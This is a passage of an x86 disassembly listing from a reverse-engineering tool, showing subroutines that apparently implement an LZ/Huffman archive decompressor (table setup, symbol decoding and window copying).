loc_9B01B5: ; CODE XREF: sub_9B012B+84�j
and [ebp+var_4], 0
test esi, esi
jle short loc_9B01E0
loc_9B01BD: ; CODE XREF: sub_9B012B+B3�j
push edi
push [ebp+arg_0]
push ebx
call sub_9B25BF
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_9B0202
mov edx, [ebp+var_4]
inc [ebp+var_4]
cmp [ebp+var_4], esi
mov ecx, [ebp+Memory]
mov [edx+ecx], al
jl short loc_9B01BD
loc_9B01E0: ; CODE XREF: sub_9B012B+90�j
mov eax, [ebp+Memory]
push esi ; Src
push dword ptr [ebp+var_C] ; char
mov ecx, edi
call sub_9AFBCB
pop ecx
pop ecx
mov esi, eax
loc_9B01F2: ; CODE XREF: sub_9B012B+D9�j
push [ebp+Memory] ; Memory
call free
pop ecx
mov eax, esi
loc_9B01FE: ; CODE XREF: sub_9B012B+88�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B0202: ; CODE XREF: sub_9B012B+A2�j
xor esi, esi
jmp short loc_9B01F2
sub_9B012B endp
; =============== S U B R O U T I N E =======================================
sub_9B0206 proc near ; CODE XREF: sub_9B030E+429�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
push edi
xor edi, edi
cmp [esp+8+arg_0], edi
jnz loc_9B02D3
push 10h ; Size
lea eax, [esi+408AF4h]
push edi ; Val
push eax ; Dst
mov [esi+408014h], edi
call memset
push 194h ; Size
lea eax, [esi+40802Ch]
push edi ; Val
push eax ; Dst
mov [esi+408B04h], edi
call memset
push 530h ; Size
lea eax, [esi+4081C0h]
push edi ; Val
push eax ; Dst
call memset
push 174h ; Size
lea eax, [esi+4086F0h]
push edi ; Val
push eax ; Dst
call memset
push 0C8h ; Size
lea eax, [esi+408864h]
push edi ; Val
push eax ; Dst
call memset
push 0F4h ; Size
lea eax, [esi+40892Ch]
push edi ; Val
push eax ; Dst
call memset
add esp, 48h
push 0D4h ; Size
lea eax, [esi+408A20h]
push edi ; Val
push eax ; Dst
call memset
push esi
mov [esi+408B08h], edi
mov [esi+408B0Ch], edi
mov dword ptr [esi+40D79Ch], 2
mov [esi+40800Ch], edi
mov [esi+408010h], edi
mov [esi+408020h], edi
call sub_9AFB83
add esp, 10h
loc_9B02D3: ; CODE XREF: sub_9B0206+C�j
lea eax, [esi+40D7CCh]
push eax
mov [esi+408008h], edi
mov [esi+408004h], edi
mov [esi+408018h], edi
mov [esi+40801Ch], edi
mov [esi+40D7BCh], edi
mov [esi+40D7C0h], edi
call sub_9B27E9
or dword ptr [esi+40D7F4h], 0FFFFFFFFh
pop ecx
pop edi
pop esi
retn
sub_9B0206 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_9B030E proc near ; CODE XREF: sub_9B0B9A+15�p
var_188 = dword ptr -188h
var_184 = dword ptr -184h
var_180 = dword ptr -180h
var_17C = dword ptr -17Ch
var_178 = dword ptr -178h
var_174 = dword ptr -174h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_93 = byte ptr -93h
var_92 = byte ptr -92h
var_91 = byte ptr -91h
var_90 = byte ptr -90h
var_8F = byte ptr -8Fh
var_8E = byte ptr -8Eh
var_8D = byte ptr -8Dh
var_8C = byte ptr -8Ch
var_8B = byte ptr -8Bh
var_8A = byte ptr -8Ah
var_89 = byte ptr -89h
var_88 = byte ptr -88h
var_87 = byte ptr -87h
var_86 = byte ptr -86h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_83 = byte ptr -83h
var_82 = byte ptr -82h
var_81 = byte ptr -81h
var_80 = byte ptr -80h
var_7F = byte ptr -7Fh
var_7E = byte ptr -7Eh
var_7D = byte ptr -7Dh
var_7C = byte ptr -7Ch
var_7B = byte ptr -7Bh
var_7A = byte ptr -7Ah
var_79 = byte ptr -79h
var_78 = byte ptr -78h
var_77 = byte ptr -77h
var_76 = byte ptr -76h
var_75 = byte ptr -75h
var_74 = byte ptr -74h
var_73 = byte ptr -73h
var_72 = byte ptr -72h
var_71 = byte ptr -71h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = byte ptr -6Eh
var_6D = byte ptr -6Dh
var_6C = byte ptr -6Ch
var_6B = byte ptr -6Bh
var_6A = byte ptr -6Ah
var_69 = byte ptr -69h
var_68 = byte ptr -68h
var_67 = byte ptr -67h
var_66 = byte ptr -66h
var_65 = byte ptr -65h
var_64 = byte ptr -64h
var_63 = byte ptr -63h
var_62 = byte ptr -62h
var_61 = byte ptr -61h
var_60 = byte ptr -60h
var_5F = byte ptr -5Fh
var_5E = byte ptr -5Eh
var_5D = byte ptr -5Dh
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = byte ptr -5Ah
var_59 = byte ptr -59h
var_58 = byte ptr -58h
var_57 = byte ptr -57h
var_56 = byte ptr -56h
var_55 = byte ptr -55h
var_54 = byte ptr -54h
var_53 = byte ptr -53h
var_52 = byte ptr -52h
var_51 = byte ptr -51h
var_50 = byte ptr -50h
var_4F = byte ptr -4Fh
var_4E = byte ptr -4Eh
var_4D = byte ptr -4Dh
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = byte ptr -48h
var_47 = byte ptr -47h
var_46 = byte ptr -46h
var_45 = byte ptr -45h
var_44 = byte ptr -44h
var_43 = byte ptr -43h
var_42 = byte ptr -42h
var_41 = byte ptr -41h
var_40 = byte ptr -40h
var_3F = byte ptr -3Fh
var_3E = byte ptr -3Eh
var_3D = byte ptr -3Dh
var_3C = byte ptr -3Ch
var_3B = byte ptr -3Bh
var_3A = byte ptr -3Ah
var_39 = byte ptr -39h
var_38 = byte ptr -38h
var_37 = byte ptr -37h
var_36 = byte ptr -36h
var_35 = byte ptr -35h
var_34 = byte ptr -34h
var_33 = byte ptr -33h
var_32 = byte ptr -32h
var_31 = byte ptr -31h
var_30 = byte ptr -30h
var_2F = byte ptr -2Fh
var_2E = byte ptr -2Eh
var_2D = byte ptr -2Dh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = byte ptr -2Ah
var_29 = byte ptr -29h
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 188h
push ebx
xor ebx, ebx
push edi
mov edi, eax
xor eax, eax
inc eax
mov [ebp+70h+var_3C], bl
mov [ebp+70h+var_3B], 1
mov [ebp+70h+var_3A], 2
mov [ebp+70h+var_39], 3
mov [ebp+70h+var_38], 4
mov [ebp+70h+var_37], 5
mov [ebp+70h+var_36], 6
mov [ebp+70h+var_35], 7
mov [ebp+70h+var_34], 8
mov [ebp+70h+var_33], 0Ah
mov [ebp+70h+var_32], 0Ch
mov [ebp+70h+var_31], 0Eh
mov [ebp+70h+var_30], 10h
mov [ebp+70h+var_2F], 14h
mov [ebp+70h+var_2E], 18h
mov [ebp+70h+var_2D], 1Ch
mov [ebp+70h+var_2C], 20h
mov [ebp+70h+var_2B], 28h
mov [ebp+70h+var_2A], 30h
mov [ebp+70h+var_29], 38h
mov [ebp+70h+var_28], 40h
mov [ebp+70h+var_27], 50h
mov [ebp+70h+var_26], 60h
mov [ebp+70h+var_25], 70h
mov [ebp+70h+var_24], 80h
mov [ebp+70h+var_23], 0A0h
mov [ebp+70h+var_22], 0C0h
mov [ebp+70h+var_21], 0E0h
mov [ebp+70h+var_58], bl
mov [ebp+70h+var_57], bl
mov [ebp+70h+var_56], bl
mov [ebp+70h+var_55], bl
mov [ebp+70h+var_54], bl
mov [ebp+70h+var_53], bl
mov [ebp+70h+var_52], bl
mov [ebp+70h+var_51], bl
mov [ebp+70h+var_50], 1
mov [ebp+70h+var_4F], 1
mov [ebp+70h+var_4E], 1
mov [ebp+70h+var_4D], 1
mov [ebp+70h+var_4C], 2
mov [ebp+70h+var_4B], 2
mov [ebp+70h+var_4A], 2
mov [ebp+70h+var_49], 2
mov [ebp+70h+var_48], 3
mov [ebp+70h+var_47], 3
mov [ebp+70h+var_46], 3
mov [ebp+70h+var_45], 3
mov [ebp+70h+var_44], 4
mov [ebp+70h+var_43], 4
mov [ebp+70h+var_42], 4
mov [ebp+70h+var_41], 4
mov [ebp+70h+var_40], 5
mov [ebp+70h+var_3F], 5
mov [ebp+70h+var_3E], 5
mov [ebp+70h+var_3D], 5
mov [ebp+70h+var_188], ebx
mov [ebp+70h+var_184], eax
mov [ebp+70h+var_180], 2
mov [ebp+70h+var_17C], 3
mov [ebp+70h+var_178], 4
mov [ebp+70h+var_174], 6
mov [ebp+70h+var_170], 8
mov [ebp+70h+var_16C], 0Ch
mov [ebp+70h+var_168], 10h
mov [ebp+70h+var_164], 18h
mov [ebp+70h+var_160], 20h
mov [ebp+70h+var_15C], 30h
mov [ebp+70h+var_158], 40h
mov [ebp+70h+var_154], 60h
mov [ebp+70h+var_150], 80h
mov [ebp+70h+var_14C], 0C0h
mov [ebp+70h+var_148], 100h
mov [ebp+70h+var_144], 180h
mov [ebp+70h+var_140], 200h
mov [ebp+70h+var_13C], 300h
mov [ebp+70h+var_138], 400h
mov [ebp+70h+var_134], 600h
mov [ebp+70h+var_130], 800h
mov [ebp+70h+var_12C], 0C00h
mov [ebp+70h+var_128], 1000h
mov [ebp+70h+var_124], 1800h
mov [ebp+70h+var_120], 2000h
mov [ebp+70h+var_11C], 3000h
mov [ebp+70h+var_118], 4000h
mov [ebp+70h+var_114], 6000h
mov [ebp+70h+var_110], 8000h
mov [ebp+70h+var_10C], 0C000h
mov [ebp+70h+var_108], 10000h
mov [ebp+70h+var_104], 18000h
mov [ebp+70h+var_100], 20000h
mov [ebp+70h+var_FC], 30000h
mov [ebp+70h+var_F8], 40000h
mov [ebp+70h+var_F4], 50000h
mov [ebp+70h+var_F0], 60000h
mov [ebp+70h+var_EC], 70000h
mov [ebp+70h+var_E8], 80000h
mov [ebp+70h+var_E4], 90000h
mov [ebp+70h+var_E0], 0A0000h
mov [ebp+70h+var_DC], 0B0000h
mov [ebp+70h+var_D8], 0C0000h
mov [ebp+70h+var_D4], 0D0000h
mov [ebp+70h+var_D0], 0E0000h
mov [ebp+70h+var_CC], 0F0000h
mov [ebp+70h+var_C8], 100000h
mov [ebp+70h+var_C4], 140000h
mov [ebp+70h+var_C0], 180000h
mov [ebp+70h+var_BC], 1C0000h
mov [ebp+70h+var_B8], 200000h
mov [ebp+70h+var_B4], 240000h
mov [ebp+70h+var_B0], 280000h
mov [ebp+70h+var_AC], 2C0000h
mov [ebp+70h+var_A8], 300000h
mov [ebp+70h+var_A4], 340000h
mov [ebp+70h+var_A0], 380000h
mov [ebp+70h+var_9C], 3C0000h
mov [ebp+70h+var_94], bl
mov [ebp+70h+var_93], bl
mov [ebp+70h+var_92], bl
mov [ebp+70h+var_91], bl
mov [ebp+70h+var_90], al
mov [ebp+70h+var_8F], al
mov [ebp+70h+var_8E], 2
mov [ebp+70h+var_8D], 2
mov [ebp+70h+var_8C], 3
mov [ebp+70h+var_8B], 3
mov [ebp+70h+var_8A], 4
mov [ebp+70h+var_89], 4
mov [ebp+70h+var_88], 5
mov [ebp+70h+var_87], 5
mov [ebp+70h+var_86], 6
mov [ebp+70h+var_85], 6
mov [ebp+70h+var_84], 7
mov [ebp+70h+var_83], 7
mov [ebp+70h+var_82], 8
mov [ebp+70h+var_81], 8
mov [ebp+70h+var_80], 9
mov [ebp+70h+var_7F], 9
mov [ebp+70h+var_7E], 0Ah
mov [ebp+70h+var_7D], 0Ah
mov [ebp+70h+var_7C], 0Bh
mov [ebp+70h+var_7B], 0Bh
mov [ebp+70h+var_7A], 0Ch
mov [ebp+70h+var_79], 0Ch
mov [ebp+70h+var_78], 0Dh
mov [ebp+70h+var_77], 0Dh
mov [ebp+70h+var_76], 0Eh
mov [ebp+70h+var_75], 0Eh
mov [ebp+70h+var_74], 0Fh
mov [ebp+70h+var_73], 0Fh
mov [ebp+70h+var_72], 10h
mov [ebp+70h+var_71], 10h
mov [ebp+70h+var_70], 10h
mov [ebp+70h+var_6F], 10h
mov [ebp+70h+var_6E], 10h
mov [ebp+70h+var_6D], 10h
push edi
push [ebp+70h+arg_4]
mov [ebp+70h+var_6C], 10h
mov [ebp+70h+var_6B], 10h
mov [ebp+70h+var_6A], 10h
mov [ebp+70h+var_69], 10h
mov [ebp+70h+var_68], 10h
mov [ebp+70h+var_67], 10h
mov [ebp+70h+var_66], 10h
mov [ebp+70h+var_65], 10h
mov [ebp+70h+var_64], 12h
mov [ebp+70h+var_63], 12h
mov [ebp+70h+var_62], 12h
mov [ebp+70h+var_61], 12h
mov [ebp+70h+var_60], 12h
mov [ebp+70h+var_5F], 12h
mov [ebp+70h+var_5E], 12h
mov [ebp+70h+var_5D], 12h
mov [ebp+70h+var_5C], 12h
mov [ebp+70h+var_5B], 12h
mov [ebp+70h+var_5A], 12h
mov [ebp+70h+var_59], 12h
mov [ebp+70h+var_18], bl
mov [ebp+70h+var_17], 4
mov [ebp+70h+var_16], 8
mov [ebp+70h+var_15], 10h
mov [ebp+70h+var_14], 20h
mov [ebp+70h+var_13], 40h
mov [ebp+70h+var_12], 80h
mov [ebp+70h+var_11], 0C0h
mov [ebp+70h+var_20], 2
mov [ebp+70h+var_1F], 2
mov [ebp+70h+var_1E], 3
mov [ebp+70h+var_1D], 4
mov [ebp+70h+var_1C], 5
mov [ebp+70h+var_1B], 6
mov [ebp+70h+var_1A], 6
mov [ebp+70h+var_19], 6
mov [ebp+70h+var_C], eax
call sub_9B0206
push edi
push [ebp+70h+arg_0]
call sub_9AF2B0
add esp, 10h
test eax, eax
jz short loc_9B0768
cmp [ebp+70h+arg_4], ebx
jz short loc_9B0759
cmp [edi+408014h], ebx
jnz short loc_9B076F
loc_9B0759: ; CODE XREF: sub_9B030E+441�j
push [ebp+70h+arg_0]
mov eax, edi
call sub_9AF875
test eax, eax
pop ecx
jnz short loc_9B076F
loc_9B0768: ; CODE XREF: sub_9B030E+43C�j
xor eax, eax
jmp loc_9B0A4A
; ---------------------------------------------------------------------------
loc_9B076F: ; CODE XREF: sub_9B030E+449�j
; sub_9B030E+458�j
push esi
loc_9B0770: ; CODE XREF: sub_9B030E+5A1�j
; sub_9B030E+5DE�j ...
mov eax, [edi+408004h]
mov esi, 3FFFFFh
and [edi+40800Ch], esi
cmp eax, [edi+40801Ch]
jle short loc_9B079C
push edi
push [ebp+70h+arg_0]
call sub_9AF2B0
test eax, eax
pop ecx
pop ecx
jz loc_9B0B92
loc_9B079C: ; CODE XREF: sub_9B030E+479�j
mov eax, [edi+408010h]
mov ecx, [edi+40800Ch]
mov edx, eax
sub edx, ecx
and edx, esi
cmp edx, 104h
jnb short loc_9B07C1
cmp eax, ecx
jz short loc_9B07C1
mov eax, edi
call sub_9AF4A5
loc_9B07C1: ; CODE XREF: sub_9B030E+4A6�j
; sub_9B030E+4AA�j
cmp dword ptr [edi+408020h], 1
jnz loc_9B08F1
push edi
push [ebp+70h+arg_0]
lea esi, [edi+408B10h]
push esi
call sub_9B25BF
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+70h+var_10], eax
jz loc_9B0B7F
cmp eax, [edi+40D79Ch]
jnz loc_9B08D9
push edi
push [ebp+70h+arg_0]
push esi
call sub_9B25BF
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_9B0B92
cmp eax, ebx
jnz short loc_9B0822
push [ebp+70h+arg_0]
mov eax, edi
call sub_9AF875
jmp loc_9B0A60
; ---------------------------------------------------------------------------
loc_9B0822: ; CODE XREF: sub_9B030E+503�j
cmp eax, 2
jz loc_9B0A3F
cmp eax, 3
jnz short loc_9B083D
push [ebp+70h+arg_0]
call sub_9B012B
jmp loc_9B0A60
; ---------------------------------------------------------------------------
loc_9B083D: ; CODE XREF: sub_9B030E+520�j
cmp eax, 4
jnz short loc_9B08B4
mov [ebp+70h+var_8], ebx
mov [ebp+70h+var_10], ebx
mov [ebp+70h+var_4], ebx
loc_9B084B: ; CODE XREF: sub_9B030E+581�j
cmp [ebp+70h+var_10], ebx
jnz loc_9B0B92
push edi
push [ebp+70h+arg_0]
push esi
call sub_9B25BF
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_9B086F
mov [ebp+70h+var_10], 1
jmp short loc_9B0888
; ---------------------------------------------------------------------------
loc_9B086F: ; CODE XREF: sub_9B030E+556�j
cmp [ebp+70h+var_4], 3
movzx eax, al
jnz short loc_9B087D
mov [ebp+70h+var_98], eax
jmp short loc_9B0888
; ---------------------------------------------------------------------------
loc_9B087D: ; CODE XREF: sub_9B030E+568�j
mov ecx, [ebp+70h+var_8]
shl ecx, 8
add ecx, eax
mov [ebp+70h+var_8], ecx
loc_9B0888: ; CODE XREF: sub_9B030E+55F�j
; sub_9B030E+56D�j
inc [ebp+70h+var_4]
cmp [ebp+70h+var_4], 4
jl short loc_9B084B
cmp [ebp+70h+var_10], ebx
jnz loc_9B0B92
mov eax, [ebp+70h+var_8]
mov ecx, [ebp+70h+var_98]
add eax, 2
add ecx, 20h
loc_9B08A6: ; CODE XREF: sub_9B030E+806�j
push eax
loc_9B08A7: ; CODE XREF: sub_9B030E+5C6�j
; sub_9B030E+77B�j
mov eax, edi
call sub_9AF1C4
loc_9B08AE: ; CODE XREF: sub_9B030E+86C�j
pop ecx
jmp loc_9B0770
; ---------------------------------------------------------------------------
loc_9B08B4: ; CODE XREF: sub_9B030E+532�j
cmp eax, 5
jnz short loc_9B08D6
push edi
push [ebp+70h+arg_0]
push esi
call sub_9B25BF
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_9B0B92
push 1
lea ecx, [eax+4]
jmp short loc_9B08A7
; ---------------------------------------------------------------------------
loc_9B08D6: ; CODE XREF: sub_9B030E+5A9�j
mov eax, [ebp+70h+var_10]
loc_9B08D9: ; CODE XREF: sub_9B030E+4E5�j
; sub_9B030E+5F9�j
mov ecx, [edi+40800Ch]
mov [ecx+edi+8004h], al
inc dword ptr [edi+40800Ch]
jmp loc_9B0770
; ---------------------------------------------------------------------------
loc_9B08F1: ; CODE XREF: sub_9B030E+4BA�j
lea eax, [edi+4081C0h]
push eax
push edi
call sub_9AF7C6
mov edx, 100h
cmp eax, edx
pop ecx
pop ecx
jl short loc_9B08D9
mov ecx, 10Fh
cmp eax, ecx
jl loc_9B0A28
sub eax, ecx
movzx esi, [ebp+eax+70h+var_3C]
movzx eax, [ebp+eax+70h+var_58]
add esi, 3
cmp eax, ebx
mov [ebp+70h+var_8], esi
mov [ebp+70h+var_4], eax
jbe short loc_9B094E
push edi
call sub_9AF27D
push 10h
pop ecx
sub ecx, [ebp+70h+var_4]
push [ebp+70h+var_4]
shr eax, cl
push edi
add esi, eax
mov [ebp+70h+var_8], esi
call sub_9AF25A
add esp, 0Ch
loc_9B094E: ; CODE XREF: sub_9B030E+61F�j
lea eax, [edi+4086F0h]
push eax
push edi
call sub_9AF7C6
mov esi, [ebp+eax*4+70h+var_188]
pop ecx
pop ecx
movzx ecx, [ebp+eax+70h+var_94]
inc esi
cmp ecx, ebx
mov [ebp+70h+var_4], ecx
jbe loc_9B0A02
cmp eax, 9
jle short loc_9B09E6
cmp ecx, 4
jbe short loc_9B09A3
push edi
call sub_9AF27D
mov edx, eax
mov eax, [ebp+70h+var_4]
push 14h
pop ecx
sub ecx, eax
shr edx, cl
add eax, 0FFFFFFFCh
push eax
push edi
shl edx, 4
add esi, edx
call sub_9AF25A
add esp, 0Ch
loc_9B09A3: ; CODE XREF: sub_9B030E+66F�j
mov eax, [edi+408028h]
cmp eax, ebx
jle short loc_9B09B6
dec eax
mov [edi+408028h], eax
jmp short loc_9B09D4
; ---------------------------------------------------------------------------
loc_9B09B6: ; CODE XREF: sub_9B030E+69D�j
lea eax, [edi+408864h]
push eax
push edi
call sub_9AF7C6
cmp eax, 10h
pop ecx
pop ecx
jnz short loc_9B09DC
mov dword ptr [edi+408028h], 0Fh
loc_9B09D4: ; CODE XREF: sub_9B030E+6A6�j
add esi, [edi+408024h]
jmp short loc_9B0A02
; ---------------------------------------------------------------------------
loc_9B09DC: ; CODE XREF: sub_9B030E+6BA�j
add esi, eax
mov [edi+408024h], eax
jmp short loc_9B0A02
; ---------------------------------------------------------------------------
loc_9B09E6: ; CODE XREF: sub_9B030E+66A�j
push edi
call sub_9AF27D
push 10h
pop ecx
sub ecx, [ebp+70h+var_4]
push [ebp+70h+var_4]
shr eax, cl
push edi
add esi, eax
call sub_9AF25A
add esp, 0Ch
loc_9B0A02: ; CODE XREF: sub_9B030E+661�j
; sub_9B030E+6CC�j ...
cmp esi, 2000h
jb short loc_9B0A18
inc [ebp+70h+var_8]
cmp esi, 40000h
jb short loc_9B0A18
inc [ebp+70h+var_8]
loc_9B0A18: ; CODE XREF: sub_9B030E+6FA�j
; sub_9B030E+705�j
push esi
mov eax, edi
call sub_9AF19A
mov ecx, [ebp+70h+var_8]
jmp loc_9B0B65
; ---------------------------------------------------------------------------
loc_9B0A28: ; CODE XREF: sub_9B030E+602�j
cmp eax, edx
jnz short loc_9B0A51
push [ebp+70h+arg_0]
mov esi, edi
call sub_9AFB2B
test eax, eax
pop ecx
jnz loc_9B0770
loc_9B0A3F: ; CODE XREF: sub_9B030E+517�j
mov eax, edi
call sub_9AF4A5
loc_9B0A46: ; CODE XREF: sub_9B030E+887�j
mov eax, [ebp+70h+var_C]
pop esi
loc_9B0A4A: ; CODE XREF: sub_9B030E+45C�j
pop edi
pop ebx
add ebp, 70h
leave
retn
; ---------------------------------------------------------------------------
loc_9B0A51: ; CODE XREF: sub_9B030E+71C�j
cmp eax, 101h
jnz short loc_9B0A6E
push [ebp+70h+arg_0]
call sub_9B0051
loc_9B0A60: ; CODE XREF: sub_9B030E+50F�j
; sub_9B030E+52A�j
test eax, eax
pop ecx
jnz loc_9B0770
jmp loc_9B0B92
; ---------------------------------------------------------------------------
loc_9B0A6E: ; CODE XREF: sub_9B030E+748�j
cmp eax, 102h
jnz short loc_9B0A8E
mov ecx, [edi+408B0Ch]
cmp ecx, ebx
jz loc_9B0770
push dword ptr [edi+408B08h]
jmp loc_9B08A7
; ---------------------------------------------------------------------------
loc_9B0A8E: ; CODE XREF: sub_9B030E+765�j
cmp eax, 107h
jge loc_9B0B19
add eax, 0FFFFFEFDh
cmp eax, ebx
lea ecx, [edi+eax*4+408AF4h]
mov edx, [ecx]
mov [ebp+70h+var_8], edx
jle short loc_9B0ABF
mov [ebp+70h+var_10], eax
loc_9B0AB1: ; CODE XREF: sub_9B030E+7AF�j
dec [ebp+70h+var_10]
lea esi, [ecx-4]
mov eax, [esi]
mov [ecx], eax
mov ecx, esi
jnz short loc_9B0AB1
loc_9B0ABF: ; CODE XREF: sub_9B030E+79E�j
lea eax, [edi+40892Ch]
push eax
push edi
mov [edi+408AF4h], edx
call sub_9AF7C6
movzx esi, [ebp+eax+70h+var_3C]
movzx eax, [ebp+eax+70h+var_58]
inc esi
pop ecx
inc esi
cmp eax, ebx
pop ecx
mov [ebp+70h+var_4], eax
jbe short loc_9B0B03
push edi
call sub_9AF27D
push 10h
pop ecx
sub ecx, [ebp+70h+var_4]
push [ebp+70h+var_4]
shr eax, cl
push edi
add esi, eax
call sub_9AF25A
add esp, 0Ch
loc_9B0B03: ; CODE XREF: sub_9B030E+7D7�j
mov eax, [ebp+70h+var_8]
mov [edi+408B08h], eax
mov [edi+408B0Ch], esi
mov ecx, esi
jmp loc_9B08A6
; ---------------------------------------------------------------------------
loc_9B0B19: ; CODE XREF: sub_9B030E+785�j
cmp eax, 110h
jge loc_9B0770
movzx esi, byte ptr [ebp+eax+70h+var_120+1]
sub eax, 107h
movzx eax, [ebp+eax+70h+var_20]
inc esi
cmp eax, ebx
mov [ebp+70h+var_4], eax
jbe short loc_9B0B5A
push edi
call sub_9AF27D
push 10h
pop ecx
sub ecx, [ebp+70h+var_4]
push [ebp+70h+var_4]
shr eax, cl
push edi
add esi, eax
call sub_9AF25A
add esp, 0Ch
loc_9B0B5A: ; CODE XREF: sub_9B030E+82E�j
push esi
mov eax, edi
call sub_9AF19A
push 2
pop ecx
loc_9B0B65: ; CODE XREF: sub_9B030E+715�j
push esi
mov eax, edi
mov [edi+408B08h], esi
mov [edi+408B0Ch], ecx
call sub_9AF1C4
pop ecx
jmp loc_9B08AE
; ---------------------------------------------------------------------------
loc_9B0B7F: ; CODE XREF: sub_9B030E+4D9�j
lea eax, [edi+408B10h]
push eax
call sub_9B24A5
pop ecx
mov [edi+408020h], ebx
loc_9B0B92: ; CODE XREF: sub_9B030E+488�j
; sub_9B030E+4FB�j ...
mov [ebp+70h+var_C], ebx
jmp loc_9B0A46
sub_9B030E endp
; =============== S U B R O U T I N E =======================================
sub_9B0B9A proc near ; CODE XREF: sub_9B0FE1+13D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
xor eax, eax
cmp [esp+arg_4], 1Dh
jnz short locret_9B0BB6
push [esp+arg_8]
mov eax, [esp+4+arg_C]
push [esp+4+arg_0]
call sub_9B030E
pop ecx
pop ecx
locret_9B0BB6: ; CODE XREF: sub_9B0B9A+7�j
retn
sub_9B0B9A endp
; =============== S U B R O U T I N E =======================================
sub_9B0BB7 proc near ; CODE XREF: sub_9B0C53+1D�p
; sub_9B0C53+85�p ...
var_2 = byte ptr -2
push ecx
sub eax, 73h
push esi
jz short loc_9B0C0E
dec eax
jz short loc_9B0BC5
loc_9B0BC1: ; CODE XREF: sub_9B0BB7+1B�j
; sub_9B0BB7+64�j ...
xor eax, eax
jmp short loc_9B0C01
; ---------------------------------------------------------------------------
loc_9B0BC5: ; CODE XREF: sub_9B0BB7+8�j
push 34h ; Size
call malloc
mov esi, eax
test esi, esi
pop ecx
jz short loc_9B0BC1
push 20h ; Size
push esi ; Dst
push edi ; int
call sub_9B3D6A
add esp, 0Ch
cmp eax, 20h
jnz short loc_9B0C2E
test byte ptr [esi+4], 1
jz short loc_9B0C04
push 8 ; Size
lea eax, [esi+20h]
push eax ; Dst
push edi ; int
call sub_9B3D6A
add esp, 0Ch
cmp eax, 8
loc_9B0BFD: ; CODE XREF: sub_9B0BB7+9A�j
jnz short loc_9B0C2E
loc_9B0BFF: ; CODE XREF: sub_9B0BB7+55�j
; sub_9B0BB7+85�j
mov eax, esi
loc_9B0C01: ; CODE XREF: sub_9B0BB7+C�j
pop esi
pop ecx
retn
; ---------------------------------------------------------------------------
loc_9B0C04: ; CODE XREF: sub_9B0BB7+32�j
and dword ptr [esi+20h], 0
and dword ptr [esi+24h], 0
jmp short loc_9B0BFF
; ---------------------------------------------------------------------------
loc_9B0C0E: ; CODE XREF: sub_9B0BB7+5�j
push 0Dh ; Size
call malloc
mov esi, eax
test esi, esi
pop ecx
jz short loc_9B0BC1
push 0Dh ; Size
push esi ; Dst
push edi ; int
call sub_9B3D6A
add esp, 0Ch
cmp eax, 0Dh
jz short loc_9B0C38
loc_9B0C2E: ; CODE XREF: sub_9B0BB7+2C�j
; sub_9B0BB7:loc_9B0BFD�j
push esi ; Memory
call free
pop ecx
jmp short loc_9B0BC1
; ---------------------------------------------------------------------------
loc_9B0C38: ; CODE XREF: sub_9B0BB7+75�j
test byte ptr [esi+4], 2
